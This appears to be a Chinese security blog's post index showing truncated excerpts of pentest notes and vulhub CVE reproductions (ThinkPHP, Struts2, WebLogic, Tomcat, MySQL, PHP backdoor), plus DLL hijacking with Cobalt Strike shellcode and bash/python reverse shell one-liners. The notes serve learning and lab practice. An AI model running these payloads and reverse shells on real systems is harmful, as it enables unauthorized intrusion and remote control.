- 博客(49)
- 收藏
- 关注
RSS订阅转载 域渗透学习笔记
初识域什么是域域(domain)是windows网络中独立运行的单位,将网络中多台计算机逻辑上组织在一起,进行集中管理,这种区别于工作组的逻辑环境叫做域。域控在一个机器上装上活动目录以后,这个机器就会被称为域控。在windows的域中,不使用主域控制器与备份域控制器。每个域控制器充当的都是一样的角色,比如你有三个域控制器,你可以在任何时候一个域控制器上对用户的权限进行修改,你的修改将被复制到其他两个域控制器中,同样,如果一个域控制器发生故障,只要其他的域控制器还能正常工作,整个域还是可以正常运行
2022-05-04 23:36:46
847
原创 dll劫持
aheadlib工具劫持可以看见生成了一个cpp文件,然后我们创建一个dll文件将生成的cpp文件替换到如下文件添加#include “pch.h”填加如下代码/* cs的payload length: 892 bytes */unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
2022-05-04 16:18:01
6184
原创 心脏滴血漏洞
漏洞成因 Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。漏洞分析最初人们为了网络通信安全,就开始使用安全协议进行加密通信,SSL(Secure Socket Layer)就是一种安全协议。随着开源软件的流行,有人写了一款叫 OpenSSL 的开源程序供大家方便地对通信进行SSL
2021-11-08 18:42:37
470
原创 xss靶场练习
- Pass-1127.0.0.1/xss/level1.php?name=<script>alert(1)</script>通过- Pass-2直接插入不行,引号将其包裹起了http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--- Pass-3审查元素看看看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
2021-11-02 21:59:45
258
原创 ssrf学习笔记
什么地方最容易出现ssrf云服务器商.(各种网站数据库操作)有远程图片加载的地方。(编辑器之类的有远程图片加载)网站采集、网页抓取的地方.(很多网站会有新闻采集输入url然后一键采集)头像的地方。(某易就是喜欢远程加载头像,例如:http://xx.com/image?url=http://1.jpg)最后一个切要输入网址的地方和可以输入IP的地方,都是ssrf的天下。...
2021-10-12 23:06:37
662
原创 json劫持学习
JSON劫持json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。靶场练习POC<!DOCTYPE html><html lang="en"><head> <m
2021-10-12 22:15:51
685
原创 未开启3389实现远程桌面
在内网渗透时如果目标没有开启3389,或者通过某种手段给禁用掉了。此时我们就可以通过今天介绍的工具进行远程连接。项目地址https://download.anydesk.com/AnyDesk.exe打开应用设置连接的用户名和密码退出本地的AnyDesk,然后到c:\Users\{USER}\AppData\Roaming\AnyDesk 目录下将ad.trace、service.conf、system.conf、user.conf这个4个文件上传到目标的c:\Users\{目标在
2021-07-25 22:23:22
618
原创 文件上传靶场练习
注意:这里的环境要为php5.6以下没有nts的Pass-01直接上传图片码抓包修改后缀即可Pass-02同样上传图片码抓包修改后缀即可,比Pass-01多了个对MIME的检测,但对于上传图片码来说就没啥区别Pass-03查看源码后台进行了黑名单限制,但是黑名单不完整,常见的可执行PHP文件的后缀:php2、php3、php5、phtml、pht 当然这个的是配置文件里有才行Pass-04查看源码$is_upload = false;$msg = null;if (is
2021-06-16 13:33:04
226
3
原创 CVE-2012-1823漏洞复现
前言这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。复现在相应的漏洞环
2021-05-27 19:28:12
597
原创 vulhub 8.1-backdoor漏洞复现
前言PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。复现用vulhub搭好环境后在请求头中构造如下payloadUser-Agentt: zerodiumvar_dump(233*233);执行系统命令:...
2021-05-26 21:39:54
702
原创 查找域管理员进程
前言在渗透测试中,一个典型的域权限提升过程,通常围绕着收集明文凭据或通过mimikatz提权等方法,在获取了管理员权限的系统中寻找域管理员登录进程,进而收集域管理员的凭据。如果内网环境非常复杂,渗透测试人员无法立即在拥有权限的系统中获得域管理员进程,那么通常采用的方法是:在跳板机之间跳转,直至获得域管理员权限,同时进行一些分析工作,进而找到渗透测试的路径。现在我们来假设一种情况:渗透测试人员在某个内网环境中获得一个域普通用户的权限,首先通过各种方法获得当前服务器的本地管理员权限,然后分析当前服务器的用户
2021-05-03 23:56:51
732
原创 msf使用基础
前言msf是后渗透神奇,在kali中已经内置有。1.1 基础使用metasploit程序需要使用postgresql数据库手动启动数据库:service postgresql start设置成开机启动数据库:systemctl enable postgresql启动msfmsfconsole1.2.查找模块search 模块名//比如我要找永恒之蓝 search ms17_010使用那个模块 use 模块名或use 前面的数字都可以1.3使用模块#查看要设置的参
2021-05-03 22:42:27
652
原创 powershell渗透基础
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。常用的powershell攻击工具有以下几种:powerSploit:常用于信息探测,权限提升,凭证窃取,持久化等操作Nishang:基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本Empire:基于powe
2021-04-30 17:19:52
1296
3
原创 msyql CVE-2012-2122漏洞复现
搭建进入vulhub对应mysql漏洞环境,执行如下命令即可docker-compose up -d如上则启动成功环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。漏洞复现在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306
2021-04-29 17:57:48
451
1
原创 ettercap 中间人攻击
ettercapettercap是linux下 一个强大的欺骗工具,当然windows也能用是一个统一的中间人攻击工具转发 MAC 与本机相同,但 IP 与本机不同的数据包支持 SSH1、SSL 中间人攻击ettercap支持图形化操作和命令行操作。下面我就演示图形化操作抓取目标机浏览的图片启动ettercapettercap -G将目标机和网关分别添加到Target1和Target2然后点击小圆圈,选择arp posisoning点击OK接下来在新的终端中输入drif
2021-04-29 12:12:50
990
原创 backdoor-factory工具使用
简介backdoor-factory是一款后门构建工具。与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。项目地址: https://github.com/secretsquirrel/the-backdoor-factory.git使用backdoor-factory常用命令-h 查看帮助信息-f 测试指定文件-S 检查软件是否支持patch-s
2021-04-25 10:42:37
759
1
原创 vuhub thinkphp-5-rce漏洞复现
搭建your-ip:8080搭建成功漏洞复现ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。poc:它将执行phpinfo/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
2021-04-24 16:00:53
578
原创 thinkphp/5.0.23-rce漏洞复现
环境搭建访问your-ip:8080环境搭建成功漏洞复现thinkphp 5.0.23(完整版)debug模式32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxxthinkphp 5.0.23(完整版)33、(post)public/index.php?s=captcha (data) _method=__co
2021-04-22 06:40:52
961
原创 elasticsearch CVE-2014-3120漏洞复现
搭建docker-compose up -d访问 your-ip:9200搭建成功复现Burpsuit抓包抓到包是这样得首先该漏洞需要es中至少存在一条数据,所有我们需要先创建一条数据POST /website/blog/ HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x
2021-04-22 04:19:43
494
原创 记一次上传绕过
闲着没事就测测站,第一次拿到shell心里属实很激动啊弱口令登进后台,找到上传点抓包,熟练得操作尼玛还有这种,菜鸡得我直接慌了,沉思了一会想应该是content-type在作怪随手一波百度直接修改content-type:multipart/form-data成功上蚁剑成功,菜鸡终于拿到shell了,太激动了...
2021-04-20 10:48:11
77
原创 Ruby on Rails CVE-2019-5418漏洞复现
搭建访问http://your-ip:3000搭建成功漏洞复现Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架构建在Ruby语言上在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。({{闭合模板路径)Rails全版本其中修复版本6.0.0.beta3,5.2.2
2021-04-12 02:44:45
261
原创 phpmyadin CVE-2016-5734漏洞复现
搭建漏洞复现下载利用脚本:https://www.exploit-db.com/exploits/40185脚本利用方法:-u 账号-p 密码-c 执行代码(php代码) 默认执行uname -apython 40185.py -u root -p root http://192.168.154.3:8080成功读取到文件接下来写入木马 python .\CVE-2016-57.py -u root --pwd="root" http://192.168.1.101:8080
2021-04-09 07:27:25
207
原创 weblogic CVE-2017-10271漏洞复现
搭建cd vulhub-master/weblogic/CVE-2017-10271/docker-compose up -d访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动复现1.初步判断:访问 http://192.168.12.147:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞2.nc监听端口,构造POST包进行测试,反弹shell使用nc 监听 21端口nc -lvp 22
2021-04-09 00:22:49
300
原创 struts2-048漏洞复现
搭建访问成功复现. 在浏览器输入以下链接访问漏洞页面http://your-ip:8080/integration/saveGangster.action在表单中填入如上,主要第一个表单其他可以随便乱写,点解submit在Gangster Name”处把${1+1}修改为以下命令执行的payload语句%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
2021-04-08 01:56:22
165
原创 Struts2-061漏洞复现
搭建https://github.com/vulhub/vulhub/tree/master/struts2/s2-061拉取镜像启动环境:docker-compose up -d成功访问http://your-ip:8080复现Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表
2021-04-08 01:31:52
265
原创 tomcat CVE-2020-1938
搭建下载好运行即可访问成功漏洞复现Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。漏洞验证POChttps://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi漏洞验证,尝试读取文件:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi成功访问到配置文
2021-04-08 01:08:10
125
原创 CVE-2017-12615(Tomcat任意文件上传漏洞)复现
环境搭建利用vulhub搭建环境1、进入vulhub对应的漏洞目录下cd /vulhub/tomcat/CVE-2017-126152.一键搭建环境docker-compose up -d访问成功复现过程抓包PUT写入木马EXP:<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String
2021-04-07 00:14:29
370
1
原创 Vulhub tomcat8漏洞复现
搭建拉取项目git clone https://github.com/vulhub/vulhub.git进入镜像:cd vulhub/tomcat/tomcat8/启动环境:docker-compose up -d登录Tomcat管理后台弱口tomcat:tomcat进入后台上传包含木马的war包getshell部署war包成功访问上冰歇成功拿下.菜鸡复现有不足望大佬指点...
2021-04-05 22:53:34
1127
原创 Mimikatz使用
简介Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要
2021-04-04 22:27:47
741
原创 SSRF
定义:SSRF(服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所有它能够请求到与它相连而与外网隔离的内部系统SSRF形成的原因大都是由于服务端提供了从 其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页 文本内容,加载指定地址的图片,下载等等。SSRF的危害1.内外网的端口和服务扫描2.攻击运行在内网或本地的应用程序3.对内网web应用进行指纹识别,
2021-03-29 23:06:12
537
原创 csrf知识
CSRF概念:CSRF跨站请求伪造,黑客诱导用户点击带有伪造请求(修改密码,转账,删除文章等高风险操作请求)链接后,利用未失效的用户认证信息,产生服务器验证请求通过,导致用户在不知名的情况下进行了转账等操作。与xss相比:xss是通过修改页面Javascript等代码后,发给用户从而实现盗取cookie信息,之后利用cookie进行登陆网站等操作。非法操作是黑客。CSRF并没有盗取cookie信息,而是通过用户直接利用cookie进行操作。非法操作并不是黑客,而是用户本身。本质上讲,csrf漏洞就是
2021-03-28 22:20:26
172
原创 viper使用
Viper安装apt-get updatecurl -sSL https://get.daocloud.io/docker | shservice docker startcurl -L https://get.daocloud.io/docker/compose/releases/download/1.25.5/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-composechmod +x /usr/local/bi
2021-03-22 21:03:43
2622
5
原创 Ehole
EHole简介EHole是一款对资产中重点系统指纹识别的工具,在红队作战中,信息收集是必不可少的环节,如何才能从大量的资产中提取有用的系统(如OA、VPN、Weblogic…)。EHole旨在帮助红队人员在信息收集期间能够快速从C段、大量杂乱的资产中精准定位到易被攻击的系统,从而实施进一步攻击。EHole提供了两种指纹识别方式,可从本地读取识别,也可以从FOFA进行批量调用API识别(需要FOFA密钥)。1.本地识别:Ehole -l url.txt//:URL.txt内每行一个地址,需带上协
2021-03-22 19:30:25
930
原创 PHP学习笔记
基础篇 <?php $v1=1; $result=isset($v1);//isset()函数判断一个值是否为空 echo $result; echo "<br>"; var_dump($result);//也是输出可以输出一个变量的完整信息 $result2=isset($v3); echo "<br>v3的结果为:"; var_dump($result); unset($v1);//unset()函数
2021-03-07 20:42:16
1240
原创 Onescan v0.3.0
前言昨天发布了我的首款工具2.0版,但是昨天晚上发现还有一些不足,并进行了修改,主要是端口扫描,对其进行了优化同时多字体颜色也进行了优化。还有就是昨天的那个文章写的也很烂,今天索性重写一个。首先该工具主要4个功能点,端口扫描,C段扫描,目录扫描,还有一个对别人的一个js扫描的优化端口扫描在0.3版中增加了端口随机化,和对效率的优化。使用: python One.py -u htttps://www.example.com -p (小写p,默认端口扫,内置有一些常见的端口) pytho
2021-02-16 13:42:00
1320
1
原创 Linux下反弹shell命令
Linux下反弹shell命令接收端口和发送端端口要一致bash反弹shell接收端: nc -lvp 端口发送端: bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1python反弹shell接收端: nc -lvp 端口发送端: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
2021-02-06 17:48:05
264
原创 服务器解析漏洞总结
服务器解析漏洞IIS5.X-6.X解析漏洞使用iis5.x-iis6.x版本的服务器,大多为windows server2003 网站比较古老,开发语句一般为asp,该解析漏洞也只能解析asp文件,而不能解析aspx文件形式1:www.xxx.com/xx.asp/xx.jpg原理:服务器默认会把.asp,.asa目录下的文件都解析成asp文件形式2:www.xxx.com/xx.asp;.jpg原理:服务器默认不解析; 号后面的内容,因此xx.asp;.jpg便被解析成asp文件了形式3
2021-02-05 18:15:02
478
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人